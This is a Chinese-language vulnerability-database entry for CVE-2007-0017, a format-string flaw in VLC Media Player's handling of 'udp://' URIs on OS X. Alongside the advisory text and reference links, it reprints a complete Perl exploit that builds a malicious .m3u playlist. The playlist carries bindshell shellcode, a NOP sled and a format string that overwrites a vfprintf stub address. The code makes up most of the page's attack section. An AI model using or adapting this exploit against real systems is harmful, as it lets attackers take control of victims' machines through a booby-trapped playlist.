VLC Media Player畸形"udp://"URI格式串处理漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111928 漏洞类型 格式化字符串
发布时间 2007-01-02 更新时间 2007-02-01
CVE编号 CVE-2007-0017 CNNVD-ID CNNVD-200701-002
漏洞平台 OSX CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3070
https://www.securityfocus.com/bid/21852
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-002
|漏洞详情
VideoLANVLCmediaplayer是法国VideoLAN组织开发的一款免费、开源的跨平台多媒体播放器(也是一个多媒体框架)。该产品支持播放多种介质(文件、光盘等)、多种音视频格式(WMV,MP3等)等。VLCMediaPlayer在处理畸形的URI串时存在漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。VLCMediaPlayer在处理"udp://"开头的URI串时存在格式串处理漏洞,远程攻击者可能利用此漏洞通过诱使用户访问恶意网页或打开恶意M3U文件控制用户机器。
|漏洞EXP
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-x86.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code.
#

$outfile = "pwnage.m3u";

$bindshell =
"\x6a\x42\x58\xcd\x80\x6a\x61\x58\x99\x52\x68\x10\x02\x11\x5c\x89" .
"\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a" .
"\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97" .
"\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49\x0f\x89\xf1\xff" .
"\xff\xff\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50" .
"\x54\x54\x53\x53\xb0\x3b\xcd\x80";

# MALLOC                 02800000-03008000 [ 8224K] rw-/rwx SM=COW  ...e_0x1300000
# Pattern found @ 0x298589e
# Pattern found @ 0x298ba92

$jmpaddr = 0x41424344;

$lo = ($jmpaddr >> 0) & 0xffff;
$hi = ($jmpaddr >> 16) & 0xffff;

printf "jump address is: 0x%x%x\n", $hi, $lo;

$format = "%25" . ($lo-0x24) . "d" . "%25" . "23" . "%24" . "hn" . "%25" . ($hi-$lo) . "d" . "%25" . "24" . "%24" . "hn" ;

$writeaddr = 0xa0011393 ; # <dyld_stub___vfprintf>

printf "writing to file: %s\n", $outfile;
open(PWNED,">$outfile");

print PWNED "#EXTM3U\n" . "#EXTINF:0,1-07 " . "\x90" x 50 . $bindshell . "\n" .
"udp://--" . pack('l', $writeaddr+2) . pack('l', $writeaddr) .
$format . "i" x (999 - length("Can't get file status for ") ) . "\n";

close(PWNED);

# milw0rm.com [2007-01-02]
|受影响的产品
VideoLAN VLC media player 0.8.6 + Debian Linux 4.0 sparc + Debian Linux 4.0 s/390 + Debian Linux 4.0 powerpc
|参考资料

来源:XF
名称:vlcmediaplayer-udp-format-string(31226)
链接:http://xforce.iss.net/xforce/xfdb/31226
来源:www.videolan.org
链接:http://www.videolan.org/sa0701.html
来源:www.videolan.org
链接:http://www.videolan.org/patches/vlc-0.8.6-MOAB-02-01-2007.patch
来源:MLIST
名称:[vlc-devel]20070102SecurityholeinVLCmediaplayerforMac...
链接:http://www.via.ecp.fr/via/ml/vlc-devel/2007-01/msg00005.html
来源:VUPEN
名称:ADV-2007-0026
链接:http://www.frsirt.com/english/advisories/2007/0026
来源:trac.videolan.org
链接:http://trac.videolan.org/vlc/changeset/18481
来源:SECTRACK
名称:1017464
链接:http://securitytracker.com/id?1017464
来源:SECUNIA
名称:23592
链接:http://secunia.com/advisories/23592
来源:MISC
链接:http://projects.info-pull.com/moab/MOAB-02-01-2007.html
来源:OSVDB
名称:31163
链接:http://osvdb.org/31163
来源:MISC
链接:http://landonf.bikemonkey.org/code/macosx/MOAB_Day_2.20070103045559.6753.timor.html
来源:MISC
链接:http://applefun.blogspot.com/2007/01/moab-02-01-2007-vlc-media-player-udp.html
来源:BID
名称:21852
链接:http://www.securityfocus.com/bid/21852
来源